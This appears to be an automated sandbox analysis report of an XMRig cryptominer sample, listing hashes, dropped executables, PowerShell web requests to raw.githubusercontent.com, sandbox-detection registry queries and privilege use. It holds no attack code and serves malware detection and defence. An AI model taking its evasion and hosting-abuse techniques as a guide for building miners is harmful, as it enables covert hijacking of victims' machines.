xmrig | a3b5d71203227639cf4e27a83b081e3cf82796fa3e9c742e0b5d158622009ccb

Analysis

max time kernel
137s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 23:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
Size

2.9MB
MD5

5c7d0ea984012b65efa75a739bfc6d40
SHA1

7e9142c874a4911b1d307546c68d53dc5f56e4a1
SHA256

a3b5d71203227639cf4e27a83b081e3cf82796fa3e9c742e0b5d158622009ccb
SHA512

af956f484294f89f2f2e94ec1de11f11c5ca7cad90e1a2aff7ead57c8d0e3a510c8ef4e8ba6ad618b88dd3ea9290ef21088046bd5c7b986b944ada79917411aa
SSDEEP

49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkyW10/wKV7hjSeC:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2RG

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3672-0-0x00007FF7F39A0000-0x00007FF7F3D96000-memory.dmp	xmrig
C:\Windows\System\GWHqASl.exe	xmrig
C:\Windows\System\pZexACs.exe	xmrig
C:\Windows\System\qaYGwrc.exe	xmrig
C:\Windows\System\rHjHSHu.exe	xmrig
C:\Windows\System\wnLylNX.exe	xmrig
behavioral2/memory/704-75-0x00007FF642230000-0x00007FF642626000-memory.dmp	xmrig
C:\Windows\System\XIEXRcv.exe	xmrig
behavioral2/memory/4396-111-0x00007FF7A0AD0000-0x00007FF7A0EC6000-memory.dmp	xmrig
C:\Windows\System\zgtBTxG.exe	xmrig
behavioral2/memory/1748-128-0x00007FF6800F0000-0x00007FF6804E6000-memory.dmp	xmrig
behavioral2/memory/3288-131-0x00007FF750290000-0x00007FF750686000-memory.dmp	xmrig
behavioral2/memory/4072-135-0x00007FF7A7840000-0x00007FF7A7C36000-memory.dmp	xmrig
behavioral2/memory/2636-139-0x00007FF7D9CD0000-0x00007FF7DA0C6000-memory.dmp	xmrig
behavioral2/memory/2816-141-0x00007FF6D05E0000-0x00007FF6D09D6000-memory.dmp	xmrig
behavioral2/memory/5064-140-0x00007FF7989E0000-0x00007FF798DD6000-memory.dmp	xmrig
behavioral2/memory/2124-138-0x00007FF7D8140000-0x00007FF7D8536000-memory.dmp	xmrig
behavioral2/memory/1276-137-0x00007FF6CF6F0000-0x00007FF6CFAE6000-memory.dmp	xmrig
behavioral2/memory/3364-136-0x00007FF75EED0000-0x00007FF75F2C6000-memory.dmp	xmrig
behavioral2/memory/532-134-0x00007FF733D80000-0x00007FF734176000-memory.dmp	xmrig
behavioral2/memory/4796-133-0x00007FF789710000-0x00007FF789B06000-memory.dmp	xmrig
behavioral2/memory/1828-132-0x00007FF65A500000-0x00007FF65A8F6000-memory.dmp	xmrig
behavioral2/memory/2388-130-0x00007FF62C370000-0x00007FF62C766000-memory.dmp	xmrig
behavioral2/memory/1752-129-0x00007FF74FF10000-0x00007FF750306000-memory.dmp	xmrig
behavioral2/memory/1300-127-0x00007FF73F250000-0x00007FF73F646000-memory.dmp	xmrig
C:\Windows\System\CzyeYXe.exe	xmrig
behavioral2/memory/4364-122-0x00007FF6C8AE0000-0x00007FF6C8ED6000-memory.dmp	xmrig
C:\Windows\System\CNFXofQ.exe	xmrig
C:\Windows\System\BbcnLVg.exe	xmrig
C:\Windows\System\HRrIVrF.exe	xmrig
C:\Windows\System\vtsGRZH.exe	xmrig
C:\Windows\System\CTJhcbE.exe	xmrig
behavioral2/memory/4640-108-0x00007FF63D1A0000-0x00007FF63D596000-memory.dmp	xmrig
behavioral2/memory/1376-94-0x00007FF77ADC0000-0x00007FF77B1B6000-memory.dmp	xmrig
C:\Windows\System\sCVivny.exe	xmrig
C:\Windows\System\OCEyheA.exe	xmrig
C:\Windows\System\DVqRczz.exe	xmrig
behavioral2/memory/344-59-0x00007FF7500B0000-0x00007FF7504A6000-memory.dmp	xmrig
C:\Windows\System\kaSFSad.exe	xmrig
C:\Windows\System\auyJVva.exe	xmrig
C:\Windows\System\CdrXBrO.exe	xmrig
C:\Windows\System\YWnvHnY.exe	xmrig
C:\Windows\System\BMcJkPi.exe	xmrig
behavioral2/memory/2324-379-0x00007FF6A1BD0000-0x00007FF6A1FC6000-memory.dmp	xmrig
C:\Windows\System\xAWYPyu.exe	xmrig
C:\Windows\System\YPgUwiJ.exe	xmrig
C:\Windows\System\ENONZnc.exe	xmrig
C:\Windows\System\rOZYgWz.exe	xmrig
C:\Windows\System\MdcVemS.exe	xmrig
C:\Windows\System\NpEauha.exe	xmrig
C:\Windows\System\ftrAVml.exe	xmrig
C:\Windows\System\jfiGgFz.exe	xmrig
C:\Windows\System\BMThVzW.exe	xmrig
C:\Windows\System\wkofbLr.exe	xmrig
C:\Windows\System\NscDEfG.exe	xmrig
C:\Windows\System\ikGhhOj.exe	xmrig
C:\Windows\System\GoaDlhA.exe	xmrig
behavioral2/memory/448-386-0x00007FF6E6250000-0x00007FF6E6646000-memory.dmp	xmrig
behavioral2/memory/5076-371-0x00007FF7BA6E0000-0x00007FF7BAAD6000-memory.dmp	xmrig
behavioral2/memory/5076-3458-0x00007FF7BA6E0000-0x00007FF7BAAD6000-memory.dmp	xmrig
behavioral2/memory/2324-3459-0x00007FF6A1BD0000-0x00007FF6A1FC6000-memory.dmp	xmrig
behavioral2/memory/448-3468-0x00007FF6E6250000-0x00007FF6E6646000-memory.dmp	xmrig
behavioral2/memory/4640-3778-0x00007FF63D1A0000-0x00007FF63D596000-memory.dmp	xmrig
behavioral2/memory/4396-3793-0x00007FF7A0AD0000-0x00007FF7A0EC6000-memory.dmp	xmrig

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
9	3980	powershell.exe
15	3980	powershell.exe
19	3980	powershell.exe
20	3980	powershell.exe
21	3980	powershell.exe
22	3980	powershell.exe
23	3980	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3980 powershell.exe

pid	process
3980	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

BMcJkPi.exeYWnvHnY.exeGWHqASl.exepZexACs.exeCdrXBrO.exerHjHSHu.exeauyJVva.exekaSFSad.exeqaYGwrc.exeDVqRczz.exeOCEyheA.exewnLylNX.exeXIEXRcv.exesCVivny.exeCTJhcbE.exevtsGRZH.exeHRrIVrF.exeBbcnLVg.exeCNFXofQ.exezgtBTxG.exeCzyeYXe.exerOZYgWz.exeNpEauha.exeftrAVml.exeENONZnc.exeikGhhOj.exejfiGgFz.exeGoaDlhA.exexAWYPyu.exeYPgUwiJ.exeNscDEfG.exewkofbLr.exeBMThVzW.exeMdcVemS.exeypLPmBh.exeDDxuZgt.exedjQCbSk.exeMRPoSBI.exeClZcxVg.exerwWIpBf.exehbxMTyy.exeSHzLJDD.exelSQwYfF.exeJAcAgBe.exemTiDmRq.exeTNZdPxT.exeabDVGqZ.exeotcROqm.exeiGsXEfR.exeJTUywQm.exeOLaMHCT.exezXLJzim.exeFXgQFbC.exeNGGvFdr.exezNBTPCb.exeUflApPj.exeYymRHba.exehEvJpxt.exeeQbyOtm.exeINGKkWw.exehAixEOx.exeuuCmCvx.exezXgALmB.exemKVyQcR.exe

pid	process
3364	BMcJkPi.exe
344	YWnvHnY.exe
704	GWHqASl.exe
1376	pZexACs.exe
4640	CdrXBrO.exe
4396	rHjHSHu.exe
4364	auyJVva.exe
1300	kaSFSad.exe
1276	qaYGwrc.exe
1748	DVqRczz.exe
1752	OCEyheA.exe
2124	wnLylNX.exe
2636	XIEXRcv.exe
2388	sCVivny.exe
5064	CTJhcbE.exe
3288	vtsGRZH.exe
1828	HRrIVrF.exe
4796	BbcnLVg.exe
532	CNFXofQ.exe
2816	zgtBTxG.exe
4072	CzyeYXe.exe
5076	rOZYgWz.exe
2324	NpEauha.exe
448	ftrAVml.exe
2940	ENONZnc.exe
4112	ikGhhOj.exe
2608	jfiGgFz.exe
2232	GoaDlhA.exe
4016	xAWYPyu.exe
364	YPgUwiJ.exe
2804	NscDEfG.exe
1572	wkofbLr.exe
4108	BMThVzW.exe
936	MdcVemS.exe
4672	ypLPmBh.exe
2720	DDxuZgt.exe
1392	djQCbSk.exe
1968	MRPoSBI.exe
3812	ClZcxVg.exe
4732	rwWIpBf.exe
1348	hbxMTyy.exe
4956	SHzLJDD.exe
1224	lSQwYfF.exe
2108	JAcAgBe.exe
3204	mTiDmRq.exe
1368	TNZdPxT.exe
4864	abDVGqZ.exe
2912	otcROqm.exe
2624	iGsXEfR.exe
3056	JTUywQm.exe
1792	OLaMHCT.exe
4924	zXLJzim.exe
2004	FXgQFbC.exe
3416	NGGvFdr.exe
4168	zNBTPCb.exe
3096	UflApPj.exe
4204	YymRHba.exe
4480	hEvJpxt.exe
2712	eQbyOtm.exe
1284	INGKkWw.exe
820	hAixEOx.exe
3028	uuCmCvx.exe
2000	zXgALmB.exe
3668	mKVyQcR.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3672-0-0x00007FF7F39A0000-0x00007FF7F3D96000-memory.dmp	upx
C:\Windows\System\GWHqASl.exe	upx
C:\Windows\System\pZexACs.exe	upx
C:\Windows\System\qaYGwrc.exe	upx
C:\Windows\System\rHjHSHu.exe	upx
C:\Windows\System\wnLylNX.exe	upx
behavioral2/memory/704-75-0x00007FF642230000-0x00007FF642626000-memory.dmp	upx
C:\Windows\System\XIEXRcv.exe	upx
behavioral2/memory/4396-111-0x00007FF7A0AD0000-0x00007FF7A0EC6000-memory.dmp	upx
C:\Windows\System\zgtBTxG.exe	upx
behavioral2/memory/1748-128-0x00007FF6800F0000-0x00007FF6804E6000-memory.dmp	upx
behavioral2/memory/3288-131-0x00007FF750290000-0x00007FF750686000-memory.dmp	upx
behavioral2/memory/4072-135-0x00007FF7A7840000-0x00007FF7A7C36000-memory.dmp	upx
behavioral2/memory/2636-139-0x00007FF7D9CD0000-0x00007FF7DA0C6000-memory.dmp	upx
behavioral2/memory/2816-141-0x00007FF6D05E0000-0x00007FF6D09D6000-memory.dmp	upx
behavioral2/memory/5064-140-0x00007FF7989E0000-0x00007FF798DD6000-memory.dmp	upx
behavioral2/memory/2124-138-0x00007FF7D8140000-0x00007FF7D8536000-memory.dmp	upx
behavioral2/memory/1276-137-0x00007FF6CF6F0000-0x00007FF6CFAE6000-memory.dmp	upx
behavioral2/memory/3364-136-0x00007FF75EED0000-0x00007FF75F2C6000-memory.dmp	upx
behavioral2/memory/532-134-0x00007FF733D80000-0x00007FF734176000-memory.dmp	upx
behavioral2/memory/4796-133-0x00007FF789710000-0x00007FF789B06000-memory.dmp	upx
behavioral2/memory/1828-132-0x00007FF65A500000-0x00007FF65A8F6000-memory.dmp	upx
behavioral2/memory/2388-130-0x00007FF62C370000-0x00007FF62C766000-memory.dmp	upx
behavioral2/memory/1752-129-0x00007FF74FF10000-0x00007FF750306000-memory.dmp	upx
behavioral2/memory/1300-127-0x00007FF73F250000-0x00007FF73F646000-memory.dmp	upx
C:\Windows\System\CzyeYXe.exe	upx
behavioral2/memory/4364-122-0x00007FF6C8AE0000-0x00007FF6C8ED6000-memory.dmp	upx
C:\Windows\System\CNFXofQ.exe	upx
C:\Windows\System\BbcnLVg.exe	upx
C:\Windows\System\HRrIVrF.exe	upx
C:\Windows\System\vtsGRZH.exe	upx
C:\Windows\System\CTJhcbE.exe	upx
behavioral2/memory/4640-108-0x00007FF63D1A0000-0x00007FF63D596000-memory.dmp	upx
behavioral2/memory/1376-94-0x00007FF77ADC0000-0x00007FF77B1B6000-memory.dmp	upx
C:\Windows\System\sCVivny.exe	upx
C:\Windows\System\OCEyheA.exe	upx
C:\Windows\System\DVqRczz.exe	upx
behavioral2/memory/344-59-0x00007FF7500B0000-0x00007FF7504A6000-memory.dmp	upx
C:\Windows\System\kaSFSad.exe	upx
C:\Windows\System\auyJVva.exe	upx
C:\Windows\System\CdrXBrO.exe	upx
C:\Windows\System\YWnvHnY.exe	upx
C:\Windows\System\BMcJkPi.exe	upx
behavioral2/memory/2324-379-0x00007FF6A1BD0000-0x00007FF6A1FC6000-memory.dmp	upx
C:\Windows\System\xAWYPyu.exe	upx
C:\Windows\System\YPgUwiJ.exe	upx
C:\Windows\System\ENONZnc.exe	upx
C:\Windows\System\rOZYgWz.exe	upx
C:\Windows\System\MdcVemS.exe	upx
C:\Windows\System\NpEauha.exe	upx
C:\Windows\System\ftrAVml.exe	upx
C:\Windows\System\jfiGgFz.exe	upx
C:\Windows\System\BMThVzW.exe	upx
C:\Windows\System\wkofbLr.exe	upx
C:\Windows\System\NscDEfG.exe	upx
C:\Windows\System\ikGhhOj.exe	upx
C:\Windows\System\GoaDlhA.exe	upx
behavioral2/memory/448-386-0x00007FF6E6250000-0x00007FF6E6646000-memory.dmp	upx
behavioral2/memory/5076-371-0x00007FF7BA6E0000-0x00007FF7BAAD6000-memory.dmp	upx
behavioral2/memory/5076-3458-0x00007FF7BA6E0000-0x00007FF7BAAD6000-memory.dmp	upx
behavioral2/memory/2324-3459-0x00007FF6A1BD0000-0x00007FF6A1FC6000-memory.dmp	upx
behavioral2/memory/448-3468-0x00007FF6E6250000-0x00007FF6E6646000-memory.dmp	upx
behavioral2/memory/4640-3778-0x00007FF63D1A0000-0x00007FF63D596000-memory.dmp	upx
behavioral2/memory/4396-3793-0x00007FF7A0AD0000-0x00007FF7A0EC6000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

8 raw.githubusercontent.com
9 raw.githubusercontent.com

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

Processes:

5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe

description	ioc	process
File created	C:\Windows\System\lRYcXHk.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\EGcygkt.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\kHcZtAC.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\fIgBFvS.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\NwCuACZ.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\vVNWXWi.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\RXiDYKz.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\tjdQUAr.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\fdZwsLW.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\KtbVJHH.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\RUShihf.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\yULphOO.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\wOmMRcb.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\hcBQVuc.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\PYrpXbc.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\VBsBzbT.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\YNgpaBN.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\rxRqAMc.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\wFmrRBJ.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\juUxxVr.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\hQjWPVC.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\PggBcER.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\nQITPsq.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\DsfIrgm.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\xRyMteQ.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\fNJfzHr.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\pCTjKGV.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\YvhpyEG.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\sywUeTw.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\EdzJUWQ.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\lHWfjBf.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\WXxyxQI.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\IETYwEC.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\pfLaDVn.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\VUqCebx.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\IszXkhw.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\FFOdlLV.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\jjLyoLX.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\bYhnhhf.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\qUWKSbz.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\VPoWVmm.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\FnYtqWQ.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\QGuttjC.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\OgZBzHu.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\awNnIbR.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\GiHYthP.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\deIxUvR.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\TRUdaeY.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\brxRhXH.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\RaLCzVv.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\BEzeUcd.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\XODtrPe.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\tokDnuT.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\CxLrhaX.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\ufpNUNW.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\bRSyfoa.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\OYlpYYG.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\OgOtwan.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\hIbTgLP.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\gfeElXj.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\EciYLkQ.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\rvwHxdm.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\grqUShu.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
File created	C:\Windows\System\QdvYBNe.exe	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

dwm.exedwm.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dwm.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

dwm.exedwm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe

Modifies data under HKEY_USERS 36 IoCs

Processes:

dwm.exedwm.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3980 powershell.exe
3980 powershell.exe
3980 powershell.exe

pid	process
3980	powershell.exe
3980	powershell.exe
3980	powershell.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exe5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exedwm.exedwm.exe

description	pid	process
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeLockMemoryPrivilege	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
Token: SeCreateGlobalPrivilege	13984	dwm.exe
Token: SeChangeNotifyPrivilege	13984	dwm.exe
Token: 33	13984	dwm.exe
Token: SeIncBasePriorityPrivilege	13984	dwm.exe
Token: SeCreateGlobalPrivilege	2580	dwm.exe
Token: SeChangeNotifyPrivilege	2580	dwm.exe
Token: 33	2580	dwm.exe
Token: SeIncBasePriorityPrivilege	2580	dwm.exe
Token: SeShutdownPrivilege	2580	dwm.exe
Token: SeCreatePagefilePrivilege	2580	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe

description	pid	process	target process
